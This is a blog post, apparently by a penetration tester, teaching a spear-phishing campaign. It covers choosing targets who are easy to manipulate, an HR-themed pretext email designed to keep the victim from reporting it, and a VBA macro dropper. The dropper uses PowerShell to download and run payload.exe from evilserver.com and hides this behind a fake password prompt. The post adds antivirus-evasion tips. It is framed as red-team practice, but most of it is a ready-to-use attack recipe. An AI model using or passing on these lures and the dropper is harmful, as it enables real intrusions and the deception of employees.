My previous article was better received than I would have thought so I thought it would be a good idea to expand on the concepts I spoke about. The first topic of conversation is one I hold near and dear, and that is Social Engineering. The hard truth is that humans are predicable and easily manipulated, which is a fact that many threat actors exploit. What we’ll discuss today is somewhat of a primer, but I’d implore you to pick up a copy of Kevin Mitnick’s book The Art of Deception if you’re interested in learning more about social engineering.
At a very high level, what we’re looking to do with our campaign is manipulate a human into doing something by playing off their emotions. As you’re no doubt aware, humans experience a wide variety of emotions and some are better to play off than others.
Emotions that make people act before they think :
- Fear / Fear of Missing Out
In my experience these are the best emotions to play off of to get someone to execute your payload. There are a great number of ways you can try to get your payload inside an organization and this article will focus on spear phishing. In the interest of brevity I won’t be discussing payload obfuscation / AV Evasion in this post but here are some resources worth checking out for more information on that.
Picking a Target
Every move of an engagement should be methodical and calculated, and picking a target to spear phish is the first real “move” that you’re going to make that will impact the client. Every action you carry out on an engagement carries a level of risk that you’ll be exposed and your engagement might meet a premature ending.
Our ideal target :
- Will execute our payload
- Won’t feel inclined to report to IT
- Has a higher level of access than most employees / Access to Sensitive deatils
- Not the most technically inclined
- BONUS : Local Admin / Domain Admin Access
During your recon phase you should identify as many staff as possible, and some will make better targets than others. Your target will also vary depending on the angle you try to penetrate the network (shockingly, there are no shortage of angles you could take to get into the network).
Based on the aforementioned criteria, the following make great targets.
- CEO or other C-level executives
- Low level management
- Human Resources
Many C-level executives do not appreciate being targeted with spear phishing attempts during penetration tests. It’s not something I agree with because I think they make ideal targets, but they pay the bills so they’ll stay off our radar.
Side note: As a penetration tester I think it’s your responsibility to make organizations aware that real threat actors will target those executives and they should take proper precautions if they refuse to allow them to be within scope for your engagement.
Finding your Angle
So we have an idea of who we want to target, and the emotions we want to exploit.
For this attack I’m going to email a member of lower management – the longer they’ve been in their position the better for this particular attack. I will send the email from a contact that supposedly works at a Human Resources Consulting company, and “mistakenly” send the email to our target while making them thing it was intended for an executive.
A few notes:
- Joe Schmoe is our HR Consultant, Johnny Manager is the target and “Tim” is the CEO in this example
- We want to host the file on a website as opposed to send it through email to avoid email scanners
- The email subject grabs the attention of the recipient, and the discussion of potential terminations (in HR talk) is likely to pique the interest of anyone. The reason we’re targeting a staff that has been in a position for a long time is because they may feel they are due to be terminated and are that much more likely to click on the links.
- The email mentions formulas which explains why macros are in the document
- The email states that the HR consultant and the intended recipient will have a phone call this afternoon. This is put in there so that the target does not notify the CEO of the fact they received the email and why the CEO didn’t. Rather than notify the CEO that the target received and executed the email, the CEO can simply tell the consultant during the phone call that they didn’t receive the email.
- The target is likely not going to mention to anyone that they’ve received this document and they attempted to open it when they knew it was privileged information
- Invest in a cheap template, some stock photos and some time into getting a decent looking website running at your fake domain
- Ensure you’ve taken the appropriate steps to get your email delivered from your hoax domain (SPF records set, etc)
- Remember that domains are like fine wines – they improve with age. The longer you have a domain the less likely it will be flagged as potentially malicious.
The All-important Document
This wouldn’t be much of a phishing attempt if we didn’t have a payload to be executed. Most macro-enabled documents these days work simply as droppers – they download and execute a file. Once that file has been executed the job of the document is complete. Simply executing the macros once should be enough to get our foot in the door (I say should here because there is always the possibility of a defence ruining our party!).
As always, there are a number of ways of accomplishing our task. Personally, I prefer to use a staged approach that goes something like this.
- Document macros are executed
- Macros invoke Powershell which then downloads and executes our payload
The reason I prefer this approach is because macros tend to receive a lot of scrutiny from Anti-Virus vendors and making them as bare-bones as possible helps with evasion. In addition, almost every (modern) Windows system has Powershell that we can leverage.
Un-obfuscated code from a macro to accomplish this is as follows.
Dim dl As String
Dim go As String
dl = "powershell.exe -exec bypass -nop (New-Object System.Net.Webclient).DownloadFile('http://evilserver.com/payload.exe','payload.exe')"
go = "powershell.exe -exec bypass -nop (New-Object -com shell.Application).ShellExecute('payload.exe')"
sPrompt = "Please enter the document password"
sTitle = "Document Password"
sDefault = "********"
sUserName = InputBox(sPrompt, sTitle, sDefault)
MsgBox "Incorrect Password"
The script above sets two variables to be PowerShell commands – One downloads our payload and the second executes it. The Auto_Open() function is used to fire the macro as soon as macros are enabled. It also presents the user with a “Password Prompt” which, no matter what the user enters, will tell them the password is incorrect. The goal here is to make the target think that the password the HR Consultant sent was incorrect.
- You may be tempted to name the exe something like ChromeInstaller.exe or AdobeUpdater.exe to trick anyone who should stumble upon the exe however this will trigger a UAC prompt upon execution. Don’t be silly and name the file “payload.exe” – that name was simply used for demonstration purposes.
- Contrary to popular opinion, you do NOT need to have a .docm extension on a word file to have your macros executed. An extension of .docm just screams “DETECT ME” so keep your extensions as just .doc.
- Make your document appear as legitimate as possible. Put a letter head at the top
Side Note : Even though we’ve made no attempts whatsoever to obfuscate the payload of the MS Word document, you’ll see that going “lean and mean” is relatively effective in itself as we’ve managed to evade about 66% of antiviruses with our macro-enabled file.
One thing that needs to be noted is that there is no “One size fits all” approach to Social Engineering. The more time you spend doing recon on the organization the better your chances will be at forming an effective attack. The attack I described here likely wouldn’t work in a large organization that is likely to have their own Human Resources department and wouldn’t require an outside consultant. It’s important to be able to adapt to the target and think critically about what potential attack vectors could work, and which ones have a higher probability of failure.
In addition it pays to spend a bit of time making your back story as convincing as possible. Invest the time to make all of your story seem more legitimate. Create a letter head for your word document, a nice signature for your emails, a passable website and so on. The more time you spend in the preparation phases (recon, setting up your story) the more likely you are to have a successful execution of your file.